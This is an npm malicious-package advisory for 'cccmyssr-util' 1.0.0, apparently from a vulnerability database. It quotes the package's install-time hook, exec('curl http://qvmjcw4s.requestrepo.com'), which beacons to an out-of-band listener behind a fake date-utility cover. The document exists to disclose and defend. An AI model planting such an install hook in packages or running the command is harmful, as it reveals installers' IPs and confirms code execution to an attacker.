npm · Malicious package advisory
Malwarecccmyssr-util
MAL-2026-6390
Malicious code in cccmyssr-util (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7)
On `npm install`, the package's postinstall.js unconditionally executes `exec('curl http://qvmjcw4s.requestrepo.com')`, sending an HTTP callback to a unique subdomain on requestrepo.com — a public out-of-band HTTP/DNS interaction service commonly used to confirm successful code execution on a target. The callback discloses the installer's public IP and a successful-install signal to the listener controlled by whoever registered the subdomain. The package presents itself as a trivial date-formatting utility (`index.js` exports a one-line `formatDate`), with empty author metadata and a generic `A harmless utility package` description; there is no legitimate rationale for any install-time network I/O. The cover-story metadata combined with an unconditional install-time beacon to an OOB inspection endpoint matches the reconnaissance/dependency-confusion probe pattern.
Compromised versions (1)
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.